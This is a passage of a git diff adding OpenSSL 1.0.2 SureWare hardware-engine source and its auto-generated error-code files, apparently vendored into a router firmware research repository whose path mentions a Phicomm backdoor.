+        ENGINEerr(func, SUREWARE_R_SIZE_TOO_LARGE_OR_TOO_SMALL);
+        break;
+    case SUREWAREHOOK_ERROR_INVALID_PAD:
+        ENGINEerr(func, SUREWARE_R_PADDING_CHECK_FAILED);
+        break;
+    default:
+        ENGINEerr(func, SUREWARE_R_REQUEST_FAILED);
+        break;
+    case 1:                    /* nothing */
+        msg[0] = '\0';
+    }
+    if (*msg) {
+        ERR_add_error_data(1, msg);
+        if (logstream) {
+            CRYPTO_w_lock(CRYPTO_LOCK_BIO);
+            BIO_write(logstream, msg, strlen(msg));
+            CRYPTO_w_unlock(CRYPTO_LOCK_BIO);
+        }
+    }
+}
+
+static int surewarehk_rand_bytes(unsigned char *buf, int num)
+{
+    int ret = 0;
+    char msg[64] = "ENGINE_rand_bytes";
+    if (!p_surewarehk_Rand_Bytes) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_RAND_BYTES,
+                    ENGINE_R_NOT_INITIALISED);
+    } else {
+        ret = p_surewarehk_Rand_Bytes(msg, buf, num);
+        surewarehk_error_handling(msg, SUREWARE_F_SUREWAREHK_RAND_BYTES, ret);
+    }
+    return ret == 1 ? 1 : 0;
+}
+
+static void surewarehk_rand_seed(const void *buf, int num)
+{
+    int ret = 0;
+    char msg[64] = "ENGINE_rand_seed";
+    if (!p_surewarehk_Rand_Seed) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_RAND_SEED,
+                    ENGINE_R_NOT_INITIALISED);
+    } else {
+        ret = p_surewarehk_Rand_Seed(msg, buf, num);
+        surewarehk_error_handling(msg, SUREWARE_F_SUREWAREHK_RAND_SEED, ret);
+    }
+}
+
+static void surewarehk_rand_add(const void *buf, int num, double entropy)
+{
+    surewarehk_rand_seed(buf, num);
+}
+
+static EVP_PKEY *sureware_load_public(ENGINE *e, const char *key_id,
+                                      char *hptr, unsigned long el,
+                                      char keytype)
+{
+    EVP_PKEY *res = NULL;
+#  ifndef OPENSSL_NO_RSA
+    RSA *rsatmp = NULL;
+#  endif
+#  ifndef OPENSSL_NO_DSA
+    DSA *dsatmp = NULL;
+#  endif
+    char msg[64] = "sureware_load_public";
+    int ret = 0;
+    if (!p_surewarehk_Load_Rsa_Pubkey || !p_surewarehk_Load_Dsa_Pubkey) {
+        SUREWAREerr(SUREWARE_F_SUREWARE_LOAD_PUBLIC,
+                    ENGINE_R_NOT_INITIALISED);
+        goto err;
+    }
+    switch (keytype) {
+#  ifndef OPENSSL_NO_RSA
+    case 1:
+         /*RSA*/
+            /* set private external reference */
+            rsatmp = RSA_new_method(e);
+        RSA_set_ex_data(rsatmp, rsaHndidx, hptr);
+        rsatmp->flags |= RSA_FLAG_EXT_PKEY;
+
+        /* set public big nums */
+        rsatmp->e = BN_new();
+        rsatmp->n = BN_new();
+        bn_expand2(rsatmp->e, el / sizeof(BN_ULONG));
+        bn_expand2(rsatmp->n, el / sizeof(BN_ULONG));
+        if (!rsatmp->e || rsatmp->e->dmax != (int)(el / sizeof(BN_ULONG)) ||
+            !rsatmp->n || rsatmp->n->dmax != (int)(el / sizeof(BN_ULONG)))
+            goto err;
+        ret = p_surewarehk_Load_Rsa_Pubkey(msg, key_id, el,
+                                           (unsigned long *)rsatmp->n->d,
+                                           (unsigned long *)rsatmp->e->d);
+        surewarehk_error_handling(msg, SUREWARE_F_SUREWARE_LOAD_PUBLIC, ret);
+        if (ret != 1) {
+            SUREWAREerr(SUREWARE_F_SUREWARE_LOAD_PUBLIC,
+                        ENGINE_R_FAILED_LOADING_PUBLIC_KEY);
+            goto err;
+        }
+        /* normalise pub e and pub n */
+        rsatmp->e->top = el / sizeof(BN_ULONG);
+        bn_fix_top(rsatmp->e);
+        rsatmp->n->top = el / sizeof(BN_ULONG);
+        bn_fix_top(rsatmp->n);
+        /* create an EVP object: engine + rsa key */
+        res = EVP_PKEY_new();
+        EVP_PKEY_assign_RSA(res, rsatmp);
+        break;
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+    case 2:
+         /*DSA*/
+            /* set private/public external reference */
+            dsatmp = DSA_new_method(e);
+        DSA_set_ex_data(dsatmp, dsaHndidx, hptr);
+        /*
+         * dsatmp->flags |= DSA_FLAG_EXT_PKEY;
+         */
+
+        /* set public key */
+        dsatmp->pub_key = BN_new();
+        dsatmp->p = BN_new();
+        dsatmp->q = BN_new();
+        dsatmp->g = BN_new();
+        bn_expand2(dsatmp->pub_key, el / sizeof(BN_ULONG));
+        bn_expand2(dsatmp->p, el / sizeof(BN_ULONG));
+        bn_expand2(dsatmp->q, 20 / sizeof(BN_ULONG));
+        bn_expand2(dsatmp->g, el / sizeof(BN_ULONG));
+        if (!dsatmp->pub_key
+            || dsatmp->pub_key->dmax != (int)(el / sizeof(BN_ULONG))
+            || !dsatmp->p || dsatmp->p->dmax != (int)(el / sizeof(BN_ULONG))
+            || !dsatmp->q || dsatmp->q->dmax != 20 / sizeof(BN_ULONG)
+            || !dsatmp->g || dsatmp->g->dmax != (int)(el / sizeof(BN_ULONG)))
+            goto err;
+
+        ret = p_surewarehk_Load_Dsa_Pubkey(msg, key_id, el,
+                                           (unsigned long *)dsatmp->
+                                           pub_key->d,
+                                           (unsigned long *)dsatmp->p->d,
+                                           (unsigned long *)dsatmp->q->d,
+                                           (unsigned long *)dsatmp->g->d);
+        surewarehk_error_handling(msg, SUREWARE_F_SUREWARE_LOAD_PUBLIC, ret);
+        if (ret != 1) {
+            SUREWAREerr(SUREWARE_F_SUREWARE_LOAD_PUBLIC,
+                        ENGINE_R_FAILED_LOADING_PUBLIC_KEY);
+            goto err;
+        }
+        /* set parameters */
+        /* normalise pubkey and parameters in case of */
+        dsatmp->pub_key->top = el / sizeof(BN_ULONG);
+        bn_fix_top(dsatmp->pub_key);
+        dsatmp->p->top = el / sizeof(BN_ULONG);
+        bn_fix_top(dsatmp->p);
+        dsatmp->q->top = 20 / sizeof(BN_ULONG);
+        bn_fix_top(dsatmp->q);
+        dsatmp->g->top = el / sizeof(BN_ULONG);
+        bn_fix_top(dsatmp->g);
+
+        /* create an EVP object: engine + rsa key */
+        res = EVP_PKEY_new();
+        EVP_PKEY_assign_DSA(res, dsatmp);
+        break;
+#  endif
+
+    default:
+        SUREWAREerr(SUREWARE_F_SUREWARE_LOAD_PUBLIC,
+                    ENGINE_R_FAILED_LOADING_PRIVATE_KEY);
+        goto err;
+    }
+    return res;
+ err:
+#  ifndef OPENSSL_NO_RSA
+    if (rsatmp)
+        RSA_free(rsatmp);
+#  endif
+#  ifndef OPENSSL_NO_DSA
+    if (dsatmp)
+        DSA_free(dsatmp);
+#  endif
+    return NULL;
+}
+
+static EVP_PKEY *surewarehk_load_privkey(ENGINE *e, const char *key_id,
+                                         UI_METHOD *ui_method,
+                                         void *callback_data)
+{
+    EVP_PKEY *res = NULL;
+    int ret = 0;
+    unsigned long el = 0;
+    char *hptr = NULL;
+    char keytype = 0;
+    char msg[64] = "ENGINE_load_privkey";
+
+    if (!p_surewarehk_Load_Privkey) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_LOAD_PRIVKEY,
+                    ENGINE_R_NOT_INITIALISED);
+    } else {
+        ret = p_surewarehk_Load_Privkey(msg, key_id, &hptr, &el, &keytype);
+        if (ret != 1) {
+            SUREWAREerr(SUREWARE_F_SUREWAREHK_LOAD_PRIVKEY,
+                        ENGINE_R_FAILED_LOADING_PRIVATE_KEY);
+            ERR_add_error_data(1, msg);
+        } else
+            res = sureware_load_public(e, key_id, hptr, el, keytype);
+    }
+    return res;
+}
+
+static EVP_PKEY *surewarehk_load_pubkey(ENGINE *e, const char *key_id,
+                                        UI_METHOD *ui_method,
+                                        void *callback_data)
+{
+    EVP_PKEY *res = NULL;
+    int ret = 0;
+    unsigned long el = 0;
+    char *hptr = NULL;
+    char keytype = 0;
+    char msg[64] = "ENGINE_load_pubkey";
+
+    if (!p_surewarehk_Info_Pubkey) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_LOAD_PUBKEY,
+                    ENGINE_R_NOT_INITIALISED);
+    } else {
+        /* call once to identify if DSA or RSA */
+        ret = p_surewarehk_Info_Pubkey(msg, key_id, &el, &keytype);
+        if (ret != 1) {
+            SUREWAREerr(SUREWARE_F_SUREWAREHK_LOAD_PUBKEY,
+                        ENGINE_R_FAILED_LOADING_PUBLIC_KEY);
+            ERR_add_error_data(1, msg);
+        } else
+            res = sureware_load_public(e, key_id, hptr, el, keytype);
+    }
+    return res;
+}
+
+/*
+ * This cleans up an RSA/DSA KM key(do not destroy the key into the hardware)
+ * , called when ex_data is freed
+ */
+static void surewarehk_ex_free(void *obj, void *item, CRYPTO_EX_DATA *ad,
+                               int idx, long argl, void *argp)
+{
+    if (!p_surewarehk_Free) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_EX_FREE, ENGINE_R_NOT_INITIALISED);
+    } else
+        p_surewarehk_Free((char *)item, 0);
+}
+
+#  if 0
+/* not currently used (bug?) */
+/*
+ * This cleans up an DH KM key (destroys the key into hardware), called when
+ * ex_data is freed
+ */
+static void surewarehk_dh_ex_free(void *obj, void *item, CRYPTO_EX_DATA *ad,
+                                  int idx, long argl, void *argp)
+{
+    if (!p_surewarehk_Free) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_DH_EX_FREE,
+                    ENGINE_R_NOT_INITIALISED);
+    } else
+        p_surewarehk_Free((char *)item, 1);
+}
+#  endif
+
+/*
+ * return number of decrypted bytes
+ */
+#  ifndef OPENSSL_NO_RSA
+static int surewarehk_rsa_priv_dec(int flen, const unsigned char *from,
+                                   unsigned char *to, RSA *rsa, int padding)
+{
+    int ret = 0, tlen;
+    char *buf = NULL, *hptr = NULL;
+    char msg[64] = "ENGINE_rsa_priv_dec";
+    if (!p_surewarehk_Rsa_Priv_Dec) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_RSA_PRIV_DEC,
+                    ENGINE_R_NOT_INITIALISED);
+    }
+    /* extract ref to private key */
+    else if (!(hptr = RSA_get_ex_data(rsa, rsaHndidx))) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_RSA_PRIV_DEC,
+                    SUREWARE_R_MISSING_KEY_COMPONENTS);
+        goto err;
+    }
+    /* analyse what padding we can do into the hardware */
+    if (padding == RSA_PKCS1_PADDING) {
+        /* do it one shot */
+        ret =
+            p_surewarehk_Rsa_Priv_Dec(msg, flen, (unsigned char *)from, &tlen,
+                                      to, hptr, SUREWARE_PKCS1_PAD);
+        surewarehk_error_handling(msg, SUREWARE_F_SUREWAREHK_RSA_PRIV_DEC,
+                                  ret);
+        if (ret != 1)
+            goto err;
+        ret = tlen;
+    } else {                    /* do with no padding into hardware */
+
+        ret =
+            p_surewarehk_Rsa_Priv_Dec(msg, flen, (unsigned char *)from, &tlen,
+                                      to, hptr, SUREWARE_NO_PAD);
+        surewarehk_error_handling(msg, SUREWARE_F_SUREWAREHK_RSA_PRIV_DEC,
+                                  ret);
+        if (ret != 1)
+            goto err;
+        /* intermediate buffer for padding */
+        if ((buf = OPENSSL_malloc(tlen)) == NULL) {
+            SUREWAREerr(SUREWARE_F_SUREWAREHK_RSA_PRIV_DEC,
+                        ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        memcpy(buf, to, tlen);  /* transfert to into buf */
+        switch (padding) {      /* check padding in software */
+#   ifndef OPENSSL_NO_SHA
+        case RSA_PKCS1_OAEP_PADDING:
+            ret =
+                RSA_padding_check_PKCS1_OAEP(to, tlen, (unsigned char *)buf,
+                                             tlen, tlen, NULL, 0);
+            break;
+#   endif
+        case RSA_SSLV23_PADDING:
+            ret =
+                RSA_padding_check_SSLv23(to, tlen, (unsigned char *)buf, flen,
+                                         tlen);
+            break;
+        case RSA_NO_PADDING:
+            ret =
+                RSA_padding_check_none(to, tlen, (unsigned char *)buf, flen,
+                                       tlen);
+            break;
+        default:
+            SUREWAREerr(SUREWARE_F_SUREWAREHK_RSA_PRIV_DEC,
+                        SUREWARE_R_UNKNOWN_PADDING_TYPE);
+            goto err;
+        }
+        if (ret < 0)
+            SUREWAREerr(SUREWARE_F_SUREWAREHK_RSA_PRIV_DEC,
+                        SUREWARE_R_PADDING_CHECK_FAILED);
+    }
+ err:
+    if (buf) {
+        OPENSSL_cleanse(buf, tlen);
+        OPENSSL_free(buf);
+    }
+    return ret;
+}
+
+/*
+ * Does what OpenSSL rsa_priv_enc does.
+ */
+static int surewarehk_rsa_sign(int flen, const unsigned char *from,
+                               unsigned char *to, RSA *rsa, int padding)
+{
+    int ret = 0, tlen;
+    char *hptr = NULL;
+    char msg[64] = "ENGINE_rsa_sign";
+    if (!p_surewarehk_Rsa_Sign) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_RSA_SIGN, ENGINE_R_NOT_INITIALISED);
+    }
+    /* extract ref to private key */
+    else if (!(hptr = RSA_get_ex_data(rsa, rsaHndidx))) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_RSA_SIGN,
+                    SUREWARE_R_MISSING_KEY_COMPONENTS);
+    } else {
+        switch (padding) {
+        case RSA_PKCS1_PADDING: /* do it in one shot */
+            ret =
+                p_surewarehk_Rsa_Sign(msg, flen, (unsigned char *)from, &tlen,
+                                      to, hptr, SUREWARE_PKCS1_PAD);
+            surewarehk_error_handling(msg, SUREWARE_F_SUREWAREHK_RSA_SIGN,
+                                      ret);
+            break;
+        case RSA_NO_PADDING:
+        default:
+            SUREWAREerr(SUREWARE_F_SUREWAREHK_RSA_SIGN,
+                        SUREWARE_R_UNKNOWN_PADDING_TYPE);
+        }
+    }
+    return ret == 1 ? tlen : ret;
+}
+
+#  endif
+
+#  ifndef OPENSSL_NO_DSA
+/* DSA sign and verify */
+static DSA_SIG *surewarehk_dsa_do_sign(const unsigned char *from, int flen,
+                                       DSA *dsa)
+{
+    int ret = 0;
+    char *hptr = NULL;
+    DSA_SIG *psign = NULL;
+    char msg[64] = "ENGINE_dsa_do_sign";
+    if (!p_surewarehk_Dsa_Sign) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_DSA_DO_SIGN,
+                    ENGINE_R_NOT_INITIALISED);
+        goto err;
+    }
+    /* extract ref to private key */
+    else if (!(hptr = DSA_get_ex_data(dsa, dsaHndidx))) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_DSA_DO_SIGN,
+                    SUREWARE_R_MISSING_KEY_COMPONENTS);
+        goto err;
+    } else {
+        if ((psign = DSA_SIG_new()) == NULL) {
+            SUREWAREerr(SUREWARE_F_SUREWAREHK_DSA_DO_SIGN,
+                        ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        psign->r = BN_new();
+        psign->s = BN_new();
+        bn_expand2(psign->r, 20 / sizeof(BN_ULONG));
+        bn_expand2(psign->s, 20 / sizeof(BN_ULONG));
+        if (!psign->r || psign->r->dmax != 20 / sizeof(BN_ULONG) ||
+            !psign->s || psign->s->dmax != 20 / sizeof(BN_ULONG))
+            goto err;
+        ret = p_surewarehk_Dsa_Sign(msg, flen, from,
+                                    (unsigned long *)psign->r->d,
+                                    (unsigned long *)psign->s->d, hptr);
+        surewarehk_error_handling(msg, SUREWARE_F_SUREWAREHK_DSA_DO_SIGN,
+                                  ret);
+    }
+    psign->r->top = 20 / sizeof(BN_ULONG);
+    bn_fix_top(psign->r);
+    psign->s->top = 20 / sizeof(BN_ULONG);
+    bn_fix_top(psign->s);
+
+ err:
+    if (psign) {
+        DSA_SIG_free(psign);
+        psign = NULL;
+    }
+    return psign;
+}
+#  endif
+
+static int surewarehk_modexp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                             const BIGNUM *m, BN_CTX *ctx)
+{
+    int ret = 0;
+    char msg[64] = "ENGINE_modexp";
+    if (!p_surewarehk_Mod_Exp) {
+        SUREWAREerr(SUREWARE_F_SUREWAREHK_MODEXP, ENGINE_R_NOT_INITIALISED);
+    } else {
+        bn_expand2(r, m->top);
+        if (r && r->dmax == m->top) {
+            /* do it */
+            ret = p_surewarehk_Mod_Exp(msg,
+                                       m->top * sizeof(BN_ULONG),
+                                       (unsigned long *)m->d,
+                                       p->top * sizeof(BN_ULONG),
+                                       (unsigned long *)p->d,
+                                       a->top * sizeof(BN_ULONG),
+                                       (unsigned long *)a->d,
+                                       (unsigned long *)r->d);
+            surewarehk_error_handling(msg, SUREWARE_F_SUREWAREHK_MODEXP, ret);
+            if (ret == 1) {
+                /* normalise result */
+                r->top = m->top;
+                bn_fix_top(r);
+            }
+        }
+    }
+    return ret;
+}
+# endif                         /* !OPENSSL_NO_HW_SureWare */
+#endif                          /* !OPENSSL_NO_HW */
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_sureware.ec b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_sureware.ec
new file mode 100644
index 0000000..3d266b8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_sureware.ec
@@ -0,0 +1 @@
+L SUREWARE	e_sureware_err.h		e_sureware_err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_sureware_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_sureware_err.c
new file mode 100644
index 0000000..f6f7eff
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_sureware_err.c
@@ -0,0 +1,154 @@
+/* e_sureware_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include "e_sureware_err.h"
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(0,func,0)
+# define ERR_REASON(reason) ERR_PACK(0,0,reason)
+
+static ERR_STRING_DATA SUREWARE_str_functs[] = {
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_CTRL), "SUREWAREHK_CTRL"},
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_DH_EX_FREE), "SUREWAREHK_DH_EX_FREE"},
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_DSA_DO_SIGN), "SUREWAREHK_DSA_DO_SIGN"},
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_EX_FREE), "SUREWAREHK_EX_FREE"},
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_FINISH), "SUREWAREHK_FINISH"},
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_INIT), "SUREWAREHK_INIT"},
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_LOAD_PRIVKEY), "SUREWAREHK_LOAD_PRIVKEY"},
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_LOAD_PUBKEY), "SUREWAREHK_LOAD_PUBKEY"},
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_MODEXP), "SUREWAREHK_MODEXP"},
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_RAND_BYTES), "SUREWAREHK_RAND_BYTES"},
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_RAND_SEED), "SUREWAREHK_RAND_SEED"},
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_RSA_PRIV_DEC), "SUREWAREHK_RSA_PRIV_DEC"},
+    {ERR_FUNC(SUREWARE_F_SUREWAREHK_RSA_SIGN), "SUREWAREHK_RSA_SIGN"},
+    {ERR_FUNC(SUREWARE_F_SUREWARE_LOAD_PUBLIC), "SUREWARE_LOAD_PUBLIC"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA SUREWARE_str_reasons[] = {
+    {ERR_REASON(SUREWARE_R_BIO_WAS_FREED), "bio was freed"},
+    {ERR_REASON(SUREWARE_R_MISSING_KEY_COMPONENTS), "missing key components"},
+    {ERR_REASON(SUREWARE_R_PADDING_CHECK_FAILED), "padding check failed"},
+    {ERR_REASON(SUREWARE_R_REQUEST_FAILED), "request failed"},
+    {ERR_REASON(SUREWARE_R_REQUEST_FALLBACK), "request fallback"},
+    {ERR_REASON(SUREWARE_R_SIZE_TOO_LARGE_OR_TOO_SMALL),
+     "size too large or too small"},
+    {ERR_REASON(SUREWARE_R_UNIT_FAILURE), "unit failure"},
+    {ERR_REASON(SUREWARE_R_UNKNOWN_PADDING_TYPE), "unknown padding type"},
+    {0, NULL}
+};
+
+#endif
+
+#ifdef SUREWARE_LIB_NAME
+static ERR_STRING_DATA SUREWARE_lib_name[] = {
+    {0, SUREWARE_LIB_NAME},
+    {0, NULL}
+};
+#endif
+
+static int SUREWARE_lib_error_code = 0;
+static int SUREWARE_error_init = 1;
+
+static void ERR_load_SUREWARE_strings(void)
+{
+    if (SUREWARE_lib_error_code == 0)
+        SUREWARE_lib_error_code = ERR_get_next_error_library();
+
+    if (SUREWARE_error_init) {
+        SUREWARE_error_init = 0;
+#ifndef OPENSSL_NO_ERR
+        ERR_load_strings(SUREWARE_lib_error_code, SUREWARE_str_functs);
+        ERR_load_strings(SUREWARE_lib_error_code, SUREWARE_str_reasons);
+#endif
+
+#ifdef SUREWARE_LIB_NAME
+        SUREWARE_lib_name->error = ERR_PACK(SUREWARE_lib_error_code, 0, 0);
+        ERR_load_strings(0, SUREWARE_lib_name);
+#endif
+    }
+}
+
+static void ERR_unload_SUREWARE_strings(void)
+{
+    if (SUREWARE_error_init == 0) {
+#ifndef OPENSSL_NO_ERR
+        ERR_unload_strings(SUREWARE_lib_error_code, SUREWARE_str_functs);
+        ERR_unload_strings(SUREWARE_lib_error_code, SUREWARE_str_reasons);
+#endif
+
+#ifdef SUREWARE_LIB_NAME
+        ERR_unload_strings(0, SUREWARE_lib_name);
+#endif
+        SUREWARE_error_init = 1;
+    }
+}
+
+static void ERR_SUREWARE_error(int function, int reason, char *file, int line)
+{
+    if (SUREWARE_lib_error_code == 0)
+        SUREWARE_lib_error_code = ERR_get_next_error_library();
+    ERR_PUT_error(SUREWARE_lib_error_code, function, reason, file, line);
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_sureware_err.h b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_sureware_err.h
new file mode 100644
index 0000000..bef8623
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_sureware_err.h
@@ -0,0 +1,104 @@
+/* ====================================================================
+ * Copyright (c) 2001 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#ifndef HEADER_SUREWARE_ERR_H
+# define HEADER_SUREWARE_ERR_H
+
+#ifdef  __cplusplus
+extern "C" {
+#endif
+
+/* BEGIN ERROR CODES */
+/*
+ * The following lines are auto generated by the script mkerr.pl. Any changes
+ * made after this point may be overwritten when the script is next run.
+ */
+static void ERR_load_SUREWARE_strings(void);
+static void ERR_unload_SUREWARE_strings(void);
+static void ERR_SUREWARE_error(int function, int reason, char *file,
+                               int line);
+# define SUREWAREerr(f,r) ERR_SUREWARE_error((f),(r),__FILE__,__LINE__)
+
+/* Error codes for the SUREWARE functions. */
+
+/* Function codes. */
+# define SUREWARE_F_SUREWAREHK_CTRL                       100
+# define SUREWARE_F_SUREWAREHK_DH_EX_FREE                 112
+# define SUREWARE_F_SUREWAREHK_DSA_DO_SIGN                101
+# define SUREWARE_F_SUREWAREHK_EX_FREE                    102
+# define SUREWARE_F_SUREWAREHK_FINISH                     103
+# define SUREWARE_F_SUREWAREHK_INIT                       104
+# define SUREWARE_F_SUREWAREHK_LOAD_PRIVKEY               105
+# define SUREWARE_F_SUREWAREHK_LOAD_PUBKEY                113
+# define SUREWARE_F_SUREWAREHK_MODEXP                     107
+# define SUREWARE_F_SUREWAREHK_RAND_BYTES                 108
+# define SUREWARE_F_SUREWAREHK_RAND_SEED                  109
+# define SUREWARE_F_SUREWAREHK_RSA_PRIV_DEC               110
+# define SUREWARE_F_SUREWAREHK_RSA_SIGN                   111
+# define SUREWARE_F_SUREWARE_LOAD_PUBLIC                  106
+
+/* Reason codes. */
+# define SUREWARE_R_BIO_WAS_FREED                         100
+# define SUREWARE_R_MISSING_KEY_COMPONENTS                105
+# define SUREWARE_R_PADDING_CHECK_FAILED                  106
+# define SUREWARE_R_REQUEST_FAILED                        101
+# define SUREWARE_R_REQUEST_FALLBACK                      102
+# define SUREWARE_R_SIZE_TOO_LARGE_OR_TOO_SMALL           103
+# define SUREWARE_R_UNIT_FAILURE                          104
+# define SUREWARE_R_UNKNOWN_PADDING_TYPE                  107
+
+#ifdef  __cplusplus
+}
+#endif
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_ubsec.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/engines/e_ubsec.c
new file mode 100644
index 0000000..2d6331d
--- /dev/null
